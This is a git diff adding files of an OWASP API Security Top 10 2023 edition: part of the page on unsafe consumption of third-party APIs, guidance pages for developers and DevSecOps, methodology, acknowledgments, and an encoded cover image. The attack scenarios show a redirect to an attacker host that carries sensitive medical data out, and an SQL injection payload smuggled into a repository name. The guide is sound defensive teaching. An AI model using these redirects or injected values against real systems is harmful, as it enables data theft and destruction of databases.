exploitable. | Developers tend to trust and not verify the endpoints that interact with external or third-party APIs, relying on weaker security requirements such as those regarding transport security, authentication/authorization, and input validation and sanitization. Attackers need to identify services the target API integrates with (data sources) and, eventually, compromise them. | The impact varies according to what the target API does with pulled data. Successful exploitation may lead to sensitive information exposure to unauthorized actors, many kinds of injections, or denial of service. | + +## Is the API Vulnerable? + +Developers tend to trust data received from third-party APIs more than user +input. This is especially true for APIs offered by well-known companies. +Because of that, developers tend to adopt weaker security standards, for +instance, in regards to input validation and sanitization. + +The API might be vulnerable if: + +* Interacts with other APIs over an unencrypted channel; +* Does not properly validate and sanitize data gathered from other APIs prior + to processing it or passing it to downstream components; +* Blindly follows redirections; +* Does not limit the number of resources available to process third-party + services responses; +* Does not implement timeouts for interactions with third-party services; + +## Example Attack Scenarios + +### Scenario #1 + +An API relies on a third-party service to enrich user provided business +addresses. When an address is supplied to the API by the end user, it is sent +to the third-party service and the returned data is then stored on a local +SQL-enabled database. + +Bad actors use the third-party service to store an SQLi payload associated with +a business created by them. Then they go after the vulnerable API providing +specific input that makes it pull their "malicious business" from the +third-party service. The SQLi payload ends up being executed by the database, +exfiltrating data to an attacker's controlled server. + +### Scenario #2 + +An API integrates with a third-party service provider to safely store sensitive +user medical information. Data is sent over a secure connection using an HTTP +request like the one below: + +``` +POST /user/store_phr_record +{ + "genome": "ACTAGTAG__TTGADDAAIICCTT…" +} +``` + +Bad actors found a way to compromise the third-party API and it starts +responding with a `308 Permanent Redirect` to requests like the previous one. + +``` +HTTP/1.1 308 Permanent Redirect +Location: https://attacker.com/ +``` + +Since the API blindly follows the third-party redirects, it will repeat the +exact same request including the user's sensitive data, but this time to the +attacker's server. + +### Scenario #3 + +An attacker can prepare a git repository named `'; drop db;--`. + +Now, when an integration from an attacked application is done with the +malicious repository, SQL injection payload is used on an application that +builds an SQL query believing the repository's name is safe input. + +## How To Prevent + +* When evaluating service providers, assess their API security posture. +* Ensure all API interactions happen over a secure communication channel (TLS). +* Always validate and properly sanitize data received from integrated APIs + before using it. +* Maintain an allowlist of well-known locations integrated APIs may redirect + yours to: do not blindly follow redirects. + + +## References + +### OWASP + +* [Web Service Security Cheat Sheet][1] +* [Injection Flaws][2] +* [Input Validation Cheat Sheet][3] +* [Injection Prevention Cheat Sheet][4] +* [Transport Layer Protection Cheat Sheet][5] +* [Unvalidated Redirects and Forwards Cheat Sheet][6] + +### External + +* [CWE-20: Improper Input Validation][7] +* [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor][8] +* [CWE-319: Cleartext Transmission of Sensitive Information][9] + +[1]: https://cheatsheetseries.owasp.org/cheatsheets/Web_Service_Security_Cheat_Sheet.html +[2]: https://www.owasp.org/index.php/Injection_Flaws +[3]: https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html +[4]: https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html +[5]: https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html +[6]: https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html +[7]: https://cwe.mitre.org/data/definitions/20.html +[8]: https://cwe.mitre.org/data/definitions/200.html +[9]: https://cwe.mitre.org/data/definitions/319.html diff --git a/editions/2023/pt-pt/0xb0-next-devs.md b/editions/2023/pt-pt/0xb0-next-devs.md new file mode 100644 index 000000000..89139c49f --- /dev/null +++ b/editions/2023/pt-pt/0xb0-next-devs.md @@ -0,0 +1,38 @@ +# What's Next For Developers + +The task to create and maintain secure applications, or fixing existing +applications, can be difficult. It is no different for APIs. + +We believe that education and awareness are key factors to writing secure +software. Everything else required to accomplish the goal depends on +**establishing and using repeatable security processes and standard security +controls**. + +OWASP provides numerous free and open resources to help you address security. +Please visit the [OWASP Projects page][1] for a comprehensive list of available +projects. + +| | | +|-|-| +| **Education** | The [Application Security Wayfinder][2] should give you a good idea about what projects are available for each stage/phase of the Software Development LifeCycle (SDLC). For hands-on learning/training you can start with [OWASP **crAPI** - **C**ompletely **R**idiculous **API**][3] or [OWASP Juice Shop][4]: both have intentionally vulnerable APIs. The [OWASP Vulnerable Web Applications Directory Project][5] provides a curated list of intentionally vulnerable applications: you'll find there several other vulnerable APIs. You can also attend [OWASP AppSec Conference][6] training sessions, or [join your local chapter][7]. | +| **Security Requirements** | Security should be part of every project from the beginning. When defining requirements, it is important to define what "secure" means for that project. OWASP recommends you use the [OWASP Application Security Verification Standard (ASVS)][8] as a guide for setting the security requirements. If you're outsourcing, consider the [OWASP Secure Software Contract Annex][9], which should be adapted according to local law and regulations. | +| **Security Architecture** | Security should remain a concern during all the project stages. The [OWASP Cheat Sheet Series][10] is a good starting point for guidance on how to design security in during the architecture phase. Among many others, you'll find the [REST Security Cheat Sheet][11] and the [REST Assessment Cheat Sheet][12] as well the [GraphQL Cheat Sheet][13]. | +| **Standard Security Controls** | Adopting standard security controls reduces the risk of introducing security weaknesses while writing your own logic. Although many modern frameworks now come with effective built-in standard controls, [OWASP Proactive Controls][14] gives you a good overview of what security controls you should look to include in your project. OWASP also provides some libraries and tools you may find valuable, such as validation controls. | +| **Secure Software Development Life Cycle** | You can use the [OWASP Software Assurance Maturity Model (SAMM)][15] to improve your processes of building APIs. Several other OWASP projects are available to help you during the different API development phases e.g., the [OWASP Code Review Guide][16]. | + +[1]: https://owasp.org/projects/ +[2]: https://owasp.org/projects/#owasp-projects-the-sdlc-and-the-security-wayfinder +[3]: https://owasp.org/www-project-crapi/ +[4]: https://owasp.org/www-project-juice-shop/ +[5]: https://owasp.org/www-project-vulnerable-web-applications-directory/ +[6]: https://owasp.org/events/ +[7]: https://owasp.org/chapters/ +[8]: https://owasp.org/www-project-application-security-verification-standard/ +[9]: https://owasp.org/www-community/OWASP_Secure_Software_Contract_Annex +[10]: https://cheatsheetseries.owasp.org/ +[11]: https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html +[12]: https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html +[13]: https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html +[14]: https://owasp.org/www-project-proactive-controls/ +[15]: https://owasp.org/www-project-samm/ +[16]: https://owasp.org/www-project-code-review-guide/ diff --git a/editions/2023/pt-pt/0xb1-next-devsecops.md b/editions/2023/pt-pt/0xb1-next-devsecops.md new file mode 100644 index 000000000..7cf75e87d --- /dev/null +++ b/editions/2023/pt-pt/0xb1-next-devsecops.md @@ -0,0 +1,29 @@ +# What's Next For DevSecOps + +Due to their importance in modern application architectures, building secure +APIs is crucial. Security cannot be neglected, and it should be part of the +whole development life cycle. Scanning and penetration testing yearly are no +longer enough. + +DevSecOps should join the development effort, facilitating continuous security +testing across the entire software development life cycle. Your goal should be +to enhance the development pipeline with security automation, but without +impacting the speed of development. + +In case of doubt, stay informed, and refer to the [DevSecOps Manifesto][1]. + +| | | +|-|-| +| **Understand the Threat Model** | Testing priorities come from a threat model. If you don't have one, consider using [OWASP Application Security Verification Standard (ASVS)][2], and the [OWASP Testing Guide][3] as an input. Involving the development team will help to make them more security-aware. | +| **Understand the SDLC** | Join the development team to better understand the Software Development Life Cycle. Your contribution on continuous security testing should be compatible with people, processes, and tools. Everyone should agree with the process, so that there's no unnecessary friction or resistance. | +| **Testing Strategies** | Since your work should not impact the development speed, you should wisely choose the best (simple, fastest, most accurate) technique to verify the security requirements. The [OWASP Security Knowledge Framework][4] and [OWASP Application Security Verification Standard][2] can be great sources of functional and nonfunctional security requirements. There are other great sources for [projects][5] and [tools][6] similar to the one offered by the [DevSecOps community][7]. | +| **Achieving Coverage and Accuracy** | You're the bridge between developers and operations teams. To achieve coverage, not only should you focus on the functionality, but also the orchestration. Work close to both development and operations teams from the beginning so you can optimize your time and effort. You should aim for a state where the essential security is verified continuously. | +| **Clearly Communicate Findings** | Contribute value with less or no friction. Deliver findings in a timely fashion, within the tools development teams are using (not PDF files). Join the development team to address the findings. Take the opportunity to educate them, clearly describing the weakness and how it can be abused, including an attack scenario to make it real. | + +[1]: https://www.devsecops.org/ +[2]: https://owasp.org/www-project-application-security-verification-standard/ +[3]: https://owasp.org/www-project-web-security-testing-guide/ +[4]: https://owasp.org/www-project-security-knowledge-framework/ +[5]: http://devsecops.github.io/ +[6]: https://github.com/devsecops/awesome-devsecops +[7]: http://devsecops.org diff --git a/editions/2023/pt-pt/0xd0-about-data.md b/editions/2023/pt-pt/0xd0-about-data.md new file mode 100644 index 000000000..3e856f718 --- /dev/null +++ b/editions/2023/pt-pt/0xd0-about-data.md @@ -0,0 +1,73 @@ +# Methodology and Data + +## Overview + +For this list update, the OWASP API Security team used the same methodology used +for the successful and well adopted 2019 list, with the addition of a 3 month +[public Call for Data][1]. Unfortunately, this call for data did not result in +data that would have enabled a relevant statistical analysis of the most common +API security issues. + +However, with a more mature API security industry capable of providing direct +feedback and insights, the update process moved forward using the same +methodology as before. + +Arrived here, we believe to have a good forward-looking awareness document for +the next three or four years, more focused on modern APIs-specific issues. The +goal of this project isn't to replace other top 10 lists, but instead to cover +the existing and upcoming top API security risks that we believe the industry +should be aware and diligent about. + +## Methodology + +In the first phase, publicly available data about API security incidents were +collected, reviewed, and categorized. Such data were collected from bug bounty +platforms and publicly available reports. Only issues reported between 2019 and +2022 were considered. This data was used to give the team a sense of in which +direction the previous top 10 list should evolve as well as to help deal with +possible contributed data bias. + +A public [Call for Data][1] ran from September 1st and November 30th, 2022. In +parallel the project team started the discussion about what has changed since +2019. The discussion included the impact of the first list, feedback received +from the community, and new trends of API security. + +The project team promoted meetings with specialists on relevant API security +threats to get insights into how victims are impacted and how those threats can +be mitigated. + +This effort resulted in an initial draft of what the team believes were the ten +most critical API security risks. The [OWASP Risk Rating Methodology][2] was +used to perform the risk analysis. Prevalence ratings were decided from a +consensus among the project team members, based on their experience in the +field. For considerations on these matters, please refer to the [API Security +Risks][3] section. + +The initial draft was then shared for review with security practitioners with +relevant experience in the API security fields. Their comments were reviewed, +discussed, and when applicable included in the document. The resulting document +was [published as a Release Candidate][4] for [open discussion][5]. Several +[community contributions][6] were included into the final document. + +The list of contributors is available in the [Acknowledgments][7] section. + +## API Specific Risks + +The list is built to address security risks that are more specific to APIs. + +It does not imply that other generic application security risks don't exist in +API based applications. For example, we didn't include risks such as "Vulnerable +and Outdated Components" or "Injection", even though you might find them in API +based applications. These risks are generic, they don't behave differently in +APIs, nor their exploitation is different. + +Our goal is to increase the awareness of security risks that deserve special +attention in APIs. + +[1]: https://owasp.org/www-project-api-security/announcements/cfd/2022/ +[2]: https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology +[3]: ./0x10-api-security-risks.md +[4]: https://owasp.org/www-project-api-security/announcements/2023/02/api-top10-2023rc +[5]: https://github.com/OWASP/API-Security/issues?q=is%3Aissue+label%3A2023RC +[6]: https://github.com/OWASP/API-Security/pulls?q=is%3Apr+label%3A2023RC +[7]: ./0xd1-acknowledgments.md diff --git a/editions/2023/pt-pt/0xd1-acknowledgments.md b/editions/2023/pt-pt/0xd1-acknowledgments.md new file mode 100644 index 000000000..19bfb30a3 --- /dev/null +++ b/editions/2023/pt-pt/0xd1-acknowledgments.md @@ -0,0 +1,13 @@ +# Acknowledgments + +## Acknowledgments to Contributors + +We'd like to thank the following contributors who contributed publicly on +GitHub, or via other means: + +247arjun, abunuwas, Alissa Knight, Arik Atar, aymenfurter, Corey J. Ball, cyn8, +d0znpp, Dan Gordon, donge, Dor Tumarkin, faizzaidi, gavjl, guybensimhon, Inês +Martins, Isabelle Mauny, Ivan Novikov, jmanico, Juan Pablo, k7jto, LaurentCB, +llegaz, Maxim Zavodchik, MrPRogers, planetlevel, rahulk22, Roey Eliyahu, Roshan +Piyush, securitylevelup, sudeshgadewar123, Tatsuya-hasegawa, tebbers, vanderaj, +wenz, xplo1t-sec, Yaniv Balmas, ynvb diff --git a/editions/2023/pt-pt/images/cover.jpg b/editions/2023/pt-pt/images/cover.jpg new file mode 100644 index 0000000000000000000000000000000000000000..db6e87f8d8a5f924006fdc7c521a13c2dee316f0 GIT binary patch literal 123390 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 